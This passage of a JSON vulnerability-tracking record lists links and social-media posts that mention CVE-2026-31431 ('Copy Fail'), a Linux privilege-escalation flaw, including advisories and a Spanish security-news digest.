{"vulnerability": "CVE-2026-31431", "sightings": [{"uuid": "978943e1-f5bb-44aa-8625-60285c2509e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/nicomen/261af7bfd7c0fb45710c2399b1196241", "content": "", "creation_timestamp": "2026-04-30T11:27:56.000000Z"}, {"uuid": "b5eec51b-e292-4568-b9df-725f183c4f97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/bykvaadm/7a9e56861ea25de49980ebb0660d7e56", "content": "", "creation_timestamp": "2026-04-30T10:17:49.000000Z"}, {"uuid": "5e0f33ae-8780-4562-ae23-efe0e6736c7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/116493321164201535", "content": "En las \u00faltimas 24 horas se han detectado vulnerabilidades cr\u00edticas que afectan sistemas Linux, cPanel, routers de Solana y Adobe Acrobat, exponiendo a usuarios a escalada de privilegios, suplantaci\u00f3n de autenticaci\u00f3n, robo de tokens y ejecuci\u00f3n remota de c\u00f3digo; adem\u00e1s, se reportan fallos en Cloudflare y un malware avanzado que amenaza sectores cient\u00edficos. Descubre estos y m\u00e1s detalles en el siguiente listado de noticias sobre seguridad inform\u00e1tica:\n\ud83d\uddde\ufe0f \u00daLTIMAS NOTICIAS EN SEGURIDAD INFORM\u00c1TICA \ud83d\udd12====| \ud83d\udd25 LO QUE DEBES SABER HOY \ufeff\ufeff30/04/26\ufeff\ufeff  \ud83d\udcc6 |==== \n\ud83d\udd12 COPY FAIL \u2014 732 BYTES TO ROOT\nSe ha descubierto una vulnerabilidad cr\u00edtica en Linux (CVE-2026-31431) que permite escalar privilegios a nivel root sin riesgo de condiciones de carrera ni necesidad de usar offsets. Esta falla evade las herramientas de integridad de archivos en disco y afecta incluso a entornos aislados como contenedores, representando un riesgo grave para la seguridad de sistemas Linux. Detectada por Xint Code, es esencial actualizar y proteger su infraestructura cuanto antes. Descubre m\u00e1s sobre esta vulnerabilidad y su impacto aqu\u00ed \ud83d\udc49 https://djar.co/3ckGrI\n\ud83c\udf10 LA INTERNET EST\u00c1 CAYENDO, CAYENDO, CAYENDO (CVE-2026-41940 EN CPANEL Y WHM)\nUna falla de suplantaci\u00f3n de autenticaci\u00f3n ha sido identificada en cPanel y WHM, dos herramientas clave para la gesti\u00f3n de hosting. Esta vulnerabilidad permite a atacantes no autenticados obtener sesiones de usuario, inclusive con privilegios de administrador root, mediante un bypass completo en la autenticaci\u00f3n. La amenaza compromete la seguridad de miles de servidores web, por lo que se recomienda aplicar los parches disponibles de inmediato. Inf\u00f3rmate sobre c\u00f3mo proteger tus sistemas aqu\u00ed \ud83d\udc49 https://djar.co/ScQtAV\n\ud83d\udd17 VULNERABILIDAD EN EL ROUTER DE SOLANA\nImportantes fallos de seguridad han sido detectados en el enrutador de la red Solana, facilitando el drenaje de cuentas de tokens y poniendo en riesgo la integridad de las transacciones financieras dentro de esta blockchain. Estas vulnerabilidades cr\u00edticas podr\u00edan comprometer fondos y confianza en la plataforma, por lo que es imprescindible que los usuarios y desarrolladores tomen medidas urgentes para mitigar estos riesgos. Detalles y recomendaciones aqu\u00ed \ud83d\udc49 https://djar.co/2clAA\n\ud83d\udcc4 TRES VULNERABILIDADES EN ADOBE ACROBAT QUE COMPROMETEN SEGURIDAD\nAdobe ha revelado tres vulnerabilidades cr\u00edticas (CVE-2026-34621, CVE-2026-34622, CVE-2026-34626) que permiten la ejecuci\u00f3n remota de c\u00f3digo y la filtraci\u00f3n de informaci\u00f3n mediante archivos PDF maliciosos. Estos fallos afectan versiones populares como Acrobat DC y Reader DC, poniendo en riesgo a millones de usuarios que manejan documentos digitales. Actualizar a la \u00faltima versi\u00f3n es fundamental para evitar intrusiones y p\u00e9rdidas de datos. Conoce los detalles y actualizaciones disponibles aqu\u00ed \ud83d\udc49 https://djar.co/Rvvu5\n\ud83c\udfdb\ufe0f LA ESTRATEGIA DEL CONGRESO CONTRA BLOQUEOS MASIVOS DE IP POR LALIGA\nEl Congreso ha aprobado una reforma a la Ley de Servicios Digitales para evitar bloqueos masivos de direcciones IP que afecten a p\u00e1ginas ajenas en procesos contra la pirater\u00eda, buscando un equilibrio entre la protecci\u00f3n de derechos y la seguridad en internet. Esta medida evita que resoluciones judiciales derriben sitios web de terceros y promueve un entorno digital m\u00e1s seguro y regulado. Entiende el alcance y las implicaciones de esta reforma aqu\u00ed \ud83d\udc49 https://djar.co/8dbV\n\u2601\ufe0f VULNERABILIDADES CR\u00cdTICAS EN LA IMPLEMENTACI\u00d3N DE CLOUDFLARE\nSe han reportado vulnerabilidades en los proxies de autorizaci\u00f3n y archivos PAC alojados por Cloudflare que afectan la gesti\u00f3n de pol\u00edticas de seguridad de identidad sin necesidad de clientes en dispositivos finales. Estas fallas, aunque t\u00e9cnicas, representan un avance en c\u00f3mo se protegen las redes y requieren atenci\u00f3n para evitar posibles explotaciones. Mantente informado sobre c\u00f3mo estas vulnerabilidades impactan la seguridad del entorno web aqu\u00ed \ud83d\udc49 https://djar.co/Y6uR\n\ud83d\udc1b DETECTANDO LA AMENAZA DEL MALWARE FAST16\nUn malware avanzado, posiblemente desarrollado o patrocinado por un estado, ha sido identificado causando sabotajes discretos mediante la manipulaci\u00f3n de programas matem\u00e1ticos y simulaciones f\u00edsicas. Esta amenaza tiene potencial para generar fallos graves, afectando sectores cient\u00edficos y tecnol\u00f3gicos sensibles. La detecci\u00f3n y respuesta temprana son claves para mitigar el da\u00f1o. Aprende c\u00f3mo proteger tus sistemas frente a Fast16 aqu\u00ed \ud83d\udc49 https://djar.co/CN8X", "creation_timestamp": "2026-04-30T11:03:37.280116Z"}, {"uuid": "01af72ac-0b9d-45e3-9e0b-9727306c902d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/Atirut.toot.community.ap.brid.gy/post/3mkpfck6l6a22", "content": "CVE-2026-31431 is one mean fucker ngl", "creation_timestamp": "2026-04-30T10:20:44.027095Z"}, {"uuid": "1b171109-f0c5-402a-8e21-40a3bca79328", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/morfie/28f7413a683b51df42e719e645a98e8b", "content": "", "creation_timestamp": "2026-04-30T11:19:59.000000Z"}, {"uuid": "dd2aac17-3ae3-486c-be12-5e22305d1a26", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.bsky.social/post/3mknpjajyr624", "content": "Copy Fail \u2013 CVE-2026-31431\n\nDiscussion", "creation_timestamp": "2026-04-29T18:18:05.707613Z"}, {"uuid": "60dfb15a-4557-44ad-b2a7-02afe99366f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/news.karthihegde.dev/post/3mknpo6uevi27", "content": "Copy Fail \u2013 CVE-2026-31431\nDiscussion | hackernews | Author: unsnap_biceps", "creation_timestamp": "2026-04-29T18:20:51.260347Z"}, {"uuid": "0ae33e1b-e7c1-4e31-b2c7-79b23b6571d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/antarcticrainforest/5170ed0e6de737c35507c13184a480e8", "content": "", "creation_timestamp": "2026-04-30T11:21:26.000000Z"}, {"uuid": "ae6d711e-3be0-453d-b2db-5643cdaaf2ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/t2saras.bsky.social/post/3mkqgkl2ym22g", "content": "CVE-2026-31431", "creation_timestamp": "2026-04-30T20:15:45.650642Z"}, {"uuid": "f4d0d85e-8fc4-4b3e-b73a-75ef9c711464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn100.bsky.social/post/3mkpjfqzn7h2z", "content": "Copy-fail-destroyer: K8s remediation for CVE-2026-31431\n\nDiscussion", "creation_timestamp": "2026-04-30T11:34:05.946110Z"}, {"uuid": "4d9d9d98-a09d-4552-95d9-e9738ab20e4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/samicrusader/b24950322bd8997484f7255b8a909795", "content": "", "creation_timestamp": "2026-04-29T21:29:08.000000Z"}, {"uuid": "56c85862-c226-46d7-8a10-5779094a4613", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/al26-009-vulnerability-affecting-linux-cve-2026-31431", "content": "", "creation_timestamp": "2026-04-30T11:15:29.000000Z"}, {"uuid": "ead1b7b5-7fc8-431f-9007-ef4b17dfc362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/n.gotosocial.tourmentine.com.ap.brid.gy/post/3mko2k2qjpml2", "content": "[lien] Copy Fail \u2014 CVE-2026-31431 #security #gik #cli #py", "creation_timestamp": "2026-04-29T21:35:24.031961Z"}, {"uuid": "d648747b-7b0a-4ab0-8370-6776701ac8aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/hrioslima/efc467849ce5e148b592b2da2a35a647", "content": "", "creation_timestamp": "2026-05-01T01:30:22.000000Z"}, {"uuid": "23470e0e-d0b3-40fe-984d-03e253bd7093", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jcrabapple.dmv.community.ap.brid.gy/post/3mkpkfhass522", "content": "Copy Fail \u2014 CVE-2026-31431\n\nhttps://copy.fail/", "creation_timestamp": "2026-04-30T11:51:52.836263Z"}, {"uuid": "591aae93-8501-4f23-abd7-6938b310d09c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://gist.github.com/maximsmol/ceb98dfce166937ddb844ce17ed795d4", "content": "", "creation_timestamp": "2026-04-30T21:25:32.000000Z"}, {"uuid": "aefe1c19-837d-4204-a149-919be3cabe7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/hrioslima/733e1771694e99033fb619ad39e649b8", "content": "", "creation_timestamp": "2026-05-01T01:21:43.000000Z"}, {"uuid": "4ba88ca6-96d3-4144-a4c2-1435ffb471b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/sambowne.infosec.exchange.ap.brid.gy/post/3mko356r3yn42", "content": "Copy Fail \u2014 CVE-2026-31431 Linux Privilege Escalation https://copy.fail/", "creation_timestamp": "2026-04-29T21:46:17.962316Z"}, {"uuid": "02f529db-0584-4baa-9002-d9fb16a1a947", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ricardobranco777/6d70f06588aa0c2a0b99a9005fb2209a", "content": "", "creation_timestamp": "2026-04-29T21:42:05.000000Z"}, {"uuid": "10f8a069-d504-49ec-99ac-b598782f840f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/frichinic/c4f10080bfa8a8fd1ec5ed349277ab42", "content": "", "creation_timestamp": "2026-04-30T20:59:06.000000Z"}, {"uuid": "64d5df8b-6ff3-4fee-acfa-7e5e94407a6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hn.rbrt.fr/post/3mko47xu26m2y", "content": "Copy Fail \u2013 CVE-2026-31431\nhttps://copy.fail/\nhttps://news.ycombinator.com/item?id=47952181", "creation_timestamp": "2026-04-29T22:05:33.369979Z"}, {"uuid": "076538fb-d17f-4af9-9305-61030d220133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ajuvo.chaos.social.ap.brid.gy/post/3mko3yssybvl2", "content": "https://security-tracker.debian.org/tracker/CVE-2026-31431", "creation_timestamp": "2026-04-29T22:01:58.581591Z"}, {"uuid": "8b10f40e-716c-4d20-8a2e-264cd683c4c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnws.bsky.social/post/3mknptyzvq32o", "content": "Copy Fail \u2013 CVE-2026-31431\nL: https://copy.fail/\nC: https://news.ycombinator.com/item?id=47952181\nposted on 2026.04.29 at 14:13:53 (c=0, p=4)", "creation_timestamp": "2026-04-29T18:24:06.490928Z"}, {"uuid": "84b5bb8f-8148-4dd5-ae9c-b8c96877d889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/MagnaCapax/0cfe2a4d9259c833f9f2a3d700678ddf", "content": "", "creation_timestamp": "2026-04-30T12:52:06.000000Z"}, {"uuid": "a8dd777d-4a9c-4318-b927-cb8d74f8d420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.acn.gov.it/portale/w/linux-disponibile-poc-per-lo-sfruttamento-della-cve-2026-31431", "content": "", "creation_timestamp": "2026-04-30T08:12:39.000000Z"}, {"uuid": "775b62ba-d903-43fc-bffa-f01b395da03b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkob6kz6pz2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-29T23:34:14.297234Z"}, {"uuid": "c998e233-a6c9-4af6-a2dc-ec17d8a592f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker-news.bsky.social/post/3mko6tgwvxa2n", "content": "Copy Fail - CVE-2026-31431 [Discussion]", "creation_timestamp": "2026-04-29T22:52:13.665819Z"}, {"uuid": "45018df4-776e-4e5c-a82c-2fadc4a73991", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/betterhn300.e-work.xyz/post/3mko4ksgsah2r", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (https://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-29T22:11:36.530898Z"}, {"uuid": "1900ed3e-104c-443e-a69c-be758a319af4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/daknhh/67f9b55c189844ba11e5eb0f71a8cbd8", "content": "", "creation_timestamp": "2026-04-30T13:14:40.000000Z"}, {"uuid": "e6832dbb-b33d-4416-a659-e3106995e718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/m3nu/c19269ef4fd6fa53b03eb388f77464da", "content": "", "creation_timestamp": "2026-04-29T22:53:05.000000Z"}, {"uuid": "a8ec01b8-252b-4761-a780-f05d09c1a44e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newsyc500.bsky.social/post/3mkof22fbvl2l", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/ (http://news.ycombinator.com/item?id=47952181)", "creation_timestamp": "2026-04-30T00:43:17.585430Z"}, {"uuid": "1073138f-9065-4573-815f-e88d513a10a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/predkambrij/85da17fa4235e4dc7305873d5df5af39", "content": "", "creation_timestamp": "2026-04-30T13:31:03.000000Z"}, {"uuid": "b724d4a0-4bfb-47ec-9c31-a488756ff0a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkobhkegnd2j", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-29T23:39:15.754389Z"}, {"uuid": "c7877ba4-027b-4bf0-b4b3-83987b3d834f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/grenkoca/d8257be909e5073e9d6f4cf20c9273c7", "content": "", "creation_timestamp": "2026-04-29T23:46:53.000000Z"}, {"uuid": "22699305-a674-48c6-a6e8-1a303b7bb672", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kdmsnr.com/post/3mkogd7ykbx2a", "content": "\ud83c\udf10\u30b3\u30d4\u30fc\u5931\u6557 \u2013 CVE-2026-31431\nhttps://copy.fail/\nvia #HackerNews", "creation_timestamp": "2026-04-30T01:06:19.358574Z"}, {"uuid": "258a891a-1afd-4db8-bfd1-1cceb00a9905", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/yht/56b48ad379122730a2c0b89eb0efcbf3", "content": "", "creation_timestamp": "2026-04-30T01:39:57.000000Z"}, {"uuid": "93da8575-dc4e-4d5b-ab51-ab56794406c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnbot.gsuscs.xyz/post/3mknqafs7g225", "content": "Copy Fail \u2013 CVE-2026-31431\n\nhttps://copy.fail/", "creation_timestamp": "2026-04-29T18:31:02.609932Z"}, {"uuid": "c40f34f4-5494-43a9-8ae2-2af742869dc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nillpo.bsky.social/post/3mkoinsi5bc2d", "content": "\u3048\u30fc\n\"Copy Fail \u2013 CVE-2026-31431 | Hacker News\"\nnews.ycombinator.com/item?id=4795...", "creation_timestamp": "2026-04-30T01:48:01.878748Z"}, {"uuid": "e58a05ce-8b75-4cdc-8c37-f16df4374e85", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/foobar.eagleusb.com/post/3mkoewntqnc24", "content": "argh, *kernel local escalation: CVE-2026-31431\n\n> exploit-intel.com/vuln/CVE-202...", "creation_timestamp": "2026-04-30T00:41:25.440832Z"}, {"uuid": "d1896df9-592a-43bd-b4cb-0f4bab170933", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nillpo.bsky.social/post/3mkoiogkxlc2d", "content": "\"Copy Fail \u2014 CVE-2026-31431\"\ncopy.fail", "creation_timestamp": "2026-04-30T01:48:24.446317Z"}, {"uuid": "44da0607-32ef-4c41-8ef9-1950df99062f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkojc3mpjj2i", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T01:59:22.451077Z"}, {"uuid": "d2830805-40b8-4345-80da-fba7b7c99cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hnbest.bsky.social/post/3mkojdpb4un2s", "content": "Copy Fail \u2013 CVE-2026-31431 https://copy.fail/\n\n\ncomments  #copy.fail", "creation_timestamp": "2026-04-30T02:00:16.235645Z"}, {"uuid": "b15e840f-045f-4d85-ace1-3a56d68ae1b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkokxsswvn2e", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T02:29:26.423636Z"}, {"uuid": "5d6e7b37-7166-48dd-8526-67fbcb45a674", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/richardevs/7dd9677bb9d7164af5f1d90f39047ea6", "content": "", "creation_timestamp": "2026-04-30T02:34:19.000000Z"}, {"uuid": "c7d2dba3-8d26-4953-a1d9-7392d32cfcdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Nyaasu66/638c072379b54a5d5e9a57cb5fbef073", "content": "", "creation_timestamp": "2026-04-30T02:44:38.000000Z"}, {"uuid": "945930f4-a336-405f-85c7-c024e3c2c560", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/wdormann/statuses/116489443704631952", "content": "So CopyFail CVE-2026-31431 is a thing.", "creation_timestamp": "2026-04-29T18:37:31.129965Z"}, {"uuid": "d6a67928-5009-4e5f-9e3f-dec4e3f07b38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkokotmfiw2u", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T02:24:24.005961Z"}, {"uuid": "00ff3292-ccc4-4184-95b8-b798e41f207e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/LionNatsu/f1d557ade3332923c2319df9799d1b5e", "content": "", "creation_timestamp": "2026-04-30T03:54:26.000000Z"}, {"uuid": "dfd3915e-4282-4ca8-828b-217d097041df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/cr0nx/3079c57310f01ad89699bda642e0e37e", "content": "", "creation_timestamp": "2026-04-30T04:05:17.000000Z"}, {"uuid": "8a311bd2-a792-4cd5-b5a2-c2bfed87e53a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ridwan-muhamad/74df4a2d89a4e6c51cc180101950c79c", "content": "", "creation_timestamp": "2026-04-30T05:26:21.000000Z"}, {"uuid": "7814c4d2-793f-4b4c-bc38-1fc85945d733", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://www.theregister.com/2026/04/30/linux_cryptographic_code_flaw/", "content": "", "creation_timestamp": "2026-04-30T05:28:35.783179Z"}, {"uuid": "f6fcca34-7e45-4547-977d-b2485d1e9d4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/wdormann.infosec.exchange.ap.brid.gy/post/3mknqm356q2l2", "content": "So CopyFail CVE-2026-31431 is a thing.", "creation_timestamp": "2026-04-29T18:37:44.845463Z"}, {"uuid": "58884637-a899-4fba-bf7e-daf86385e130", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/wangjiezhe/0f0617910e7775254fc582a4594c5e90", "content": "", "creation_timestamp": "2026-04-30T15:03:14.000000Z"}, {"uuid": "ddf88edd-3715-44fe-8084-9b4d31e6cc92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/main/copy_fail_exp.py", "content": "", "creation_timestamp": "2026-04-30T05:28:48.129836Z"}, {"uuid": "d191a61b-c863-419e-bf00-f9fef0e47c54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/antarcticrainforest/aa784d8f9cd8b0cc25a277cce595d450", "content": "", "creation_timestamp": "2026-04-30T06:43:27.000000Z"}, {"uuid": "ef50cc3c-b962-4e26-8c27-8c551d5e81d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://vulnerability.circl.lu/comment/22701e2f-15d4-44db-9df9-7e7cdb26d102", "content": 